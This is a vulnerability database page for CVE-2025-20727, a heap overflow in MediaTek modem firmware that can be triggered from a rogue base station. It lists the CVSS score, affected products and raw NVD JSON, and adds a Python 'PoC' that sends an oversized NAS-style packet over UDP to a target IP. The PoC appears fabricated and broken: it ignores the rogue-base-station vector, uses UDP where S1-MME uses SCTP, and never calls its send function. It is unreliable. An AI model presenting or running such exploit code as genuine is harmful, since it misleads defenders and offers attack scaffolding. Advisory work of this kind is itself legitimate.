Security Vulnerability Report
中文
CVE-2025-20727 CVSS 8.1 HIGH

CVE-2025-20727

Published: 2025-11-04 07:15:35
Last Modified: 2026-02-04 15:16:12
Source: [email protected]

Description

In Modem, there is a possible out of bounds write due to a heap buffer overflow. This could lead to remote escalation of privilege, if a UE has connected to a rogue base station controlled by the attacker, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01672601; Issue ID: MSV-4623.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:mediatek:lr12a:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:mediatek:nr15:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:mediatek:nr16:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:mediatek:nr17:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:mediatek:nr17r:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:mediatek:mt2735:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:mediatek:mt2737:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:mediatek:mt6739:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:mediatek:mt6761:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:mediatek:mt6762:-:*:*:*:*:*:*:* - NOT VULNERABLE
MediaTek Modem firmware with Patch ID MOLY01672601 (unpatched versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-20727 MediaTek Modem Heap Buffer Overflow PoC # This is a conceptual proof-of-concept for security research # DO NOT use for unauthorized testing import struct import socket class MaliciousBaseStation: def __init__(self, target_ip): self.target_ip = target_ip self.port = 38412 # LTE S1-MME port def craft_malicious_packet(self): # Construct malicious NAS message with oversized IE packet = bytearray() # Protocol discriminator and security header packet.extend([0x41, 0x00]) # Message type: Attach Request packet.append(0x41) # EPS Attach Type packet.append(0x01) # NAS Key Set Identifier packet.append(0x07) # EPS Mobile Identity - Long format packet.append(0xF0) packet.extend([0x08, 0x21, 0x43, 0x65, 0x87, 0xF9]) # GUTI # Crafted Information Element with overflow data ie_type = 0xFF ie_length = 0xFFFF # Malicious oversized length overflow_data = b'A' * 0x2000 # 8KB overflow payload packet.append(ie_type) packet.extend(struct.pack('>H', ie_length)) packet.extend(overflow_data) return bytes(packet) def send_exploit(self): sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) malicious_packet = self.craft_malicious_packet() sock.sendto(malicious_packet, (self.target_ip, self.port)) sock.close() print(f"Malicious packet sent to {self.target_ip}") if __name__ == "__main__": print("CVE-2025-20727 PoC - MediaTek Modem Heap Overflow") print("For authorized security testing only")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-20727", "sourceIdentifier": "[email protected]", "published": "2025-11-04T07:15:34.540", "lastModified": "2026-02-04T15:16:12.253", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "In Modem, there is a possible out of bounds write due to a heap buffer overflow. This could lead to remote escalation of privilege, if a UE has connected to a rogue base station controlled by the attacker, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01672601; Issue ID: MSV-4623."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:mediatek:lr12a:-:*:*:*:*:*:*:*", "matchCriteriaId": "A4B6AFD8-6CBA-4A1D-B38F-A9ABFEB6EFC5"}, {"vulnerable": true, "criteria": "cpe:2.3:o:mediatek:nr15:-:*:*:*:*:*:*:*", "matchCriteriaId": "E30A2D2E-6A72-4070-A471-EEE75F7D07F2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:mediatek:nr16:-:*:*:*:*:*:*:*", "matchCriteriaId": "2B763B71-F913-45B4-B91E-D7F0670C4315"}, {"vulnerable": true, "criteria": "cpe:2.3:o:mediatek:nr17:-:*:*:*:*:*:*:*", "matchCriteriaId": "66F8874B-DBF1-4A67-8ADF-4654AB56B6A8"}, {"vulnerable": true, "criteria": "cpe:2.3:o:mediatek:nr17r:-:*:*:*:*:*:*:*", "matchCriteriaId": "BC63582A-F9A5-4450-A263-CE1FD4B4F3AC"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:mediatek:mt2735:-:*:*:*:*:*:*:*", "matchCriteriaId": "7F1D09FC-5BE9-4B23-82F1-3C6EAC5711A6"}, {"vulnerable": false, "criteria": "cpe:2.3:h:mediatek:mt2737:-:*:*:*:*:*:*:*", "matchCriteriaId": "9C2A1118-B5F7-4EF5-B329-0887B5F3430E"}, {"vulnerable": false, "criteria": "cpe:2.3:h:mediatek:mt6739:-:*:*:*:*:*:*:*", "matchCriteriaId": "7FA8A390-9F52-4CF3-9B45-936CE3E2B828"}, {"vulnerable": false, "criteria": "cpe:2.3:h:mediatek:mt6761:-:*:*:*:*:*:*:*", "matchCriteriaId": "F726F486-A86F-4215-AD93-7A07A071844A"}, {"vulnerable": false, "criteria": "cpe:2.3:h:mediatek:mt6762:-:*:*:*:*:*:*:*", "matchCriteriaId": "C445EB80-6021-4E26-B74E-1B4B6910CE48"}, {"vulnerable": false, "criteria": "cpe:2.3:h:mediatek:mt6762d:-:*:*:*:*:*:*:*", "matchCriteriaId": "160C2DDD-6CA5-4E4F-B885-C8AAA7D1D942"}, {"vulnerable": false, "criteria": "cpe:2.3:h:mediatek:mt6762m:-:*:*:*:*:*:*:*", "matchCriteriaId": "0002C537-4268-43CA-B349-BC14F1F0313C"}, {"vulnerable": false, "criteria": "cpe:2.3:h:mediatek:mt6763:-:*:*:*:*:*:*:*", "matchCriteriaId": "2F19C76A-50DF-4ACA-BACA-07157B4D838B"}, {"vulnerable": false, "criteria": "cpe:2.3:h:mediatek:mt6765:-:*:*:*:*:*:*:*", "matchCriteriaId": "43E779F6-F0A0-4153-9A1D-B715C3A2F80E"}, {"vulnerable": false, "criteria": "cpe:2.3:h:mediatek:mt6765t:-:*:*:*:*:*:*:*", "matchCriteriaId": "AE80B083-D5A3-418C-9655-C79C9DECB4C5"}, {"vulnerable": false, "criteria": "cpe:2.3:h:mediatek:mt6767:-:*:*:*:*:*:*:*", "matchCriteriaId": "3367BA13-9C4D-4CCF-8E71-397F33CFF773"}, {"vulnerable": false, "criteria": "cpe:2.3:h:mediatek:mt6768:-:*:*:*:*:*:*:*", "matchCriteriaId": "06CD97E1-8A76-48B4-9780-9698EF5A960F"}, {"vulnerable": false, "criteria": "cpe:2.3:h:mediatek:mt6769:-:*:*:*:*:*:*:*", "matchCriteriaId": "D23991D5-1893-49F4-8A06-D5E66C96C3B3"}, {"vulnerable": false, "criteria": "cpe:2.3:h:mediatek:mt6769k:-:*:*:*:*:*:*:*", "matchCriteriaId": "2B0EFB31-7B79-4529-A978-FA227D77F9F4"}, {"vulnerable": false, "criteria": "cpe:2.3:h:mediatek:mt6769s:-:*:*:*:*:*:*:*", "matchCriteriaId": "2DD67454-1786-4BC7-B97E-96898F5FE3AF"}, {"vulnerable": false, "criteria": "cpe:2.3:h:mediatek:mt6769t:-:*:*:*:*:*:*:*", "matchCriteriaId": "B43D63CF-FF77-41D8-BA4B-F8BDF88830BA"}, {"vulnerable": false, "criteria": "cpe:2.3:h:mediatek:mt6769z:-:*:*:*:*:*:*:*", "matchCriteriaId": "BA1BE913-70AE-49FE-99E9-E996165DF79D"}, {"vulnerable": false, "criteria": "cpe:2.3:h:mediatek:mt6771:-:*:*:*:*:*:*:*", "matchCriteriaId": "BE4D2AED-C713-407F-A34A-52C3D8F65835"}, {"vulnerable": false, "criteria": "cpe:2.3:h:mediatek:mt6813:-:*:*:*:*:*:*:*", "matchCriteriaId": "66F9EAE4-F1D7-46DB-AA2A-0290F6EF0501"}, {"vulnerable": false, "criteria": "cpe:2.3:h:mediatek:mt6833:-:*:*:*:*:*:*:*", "matchCriteriaId": "9814939B-F05E-4870-90C0-7C0F6BAAEB39"}, {"vulnerable": false, "criteria": "cpe:2.3:h:mediatek:mt6833p:-:*:*:*:*:*:*:*", "matchCriteriaId": "CB690F5A-9367-45D3-A53E-80BF60053630"}, {"vul ... (truncated)
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.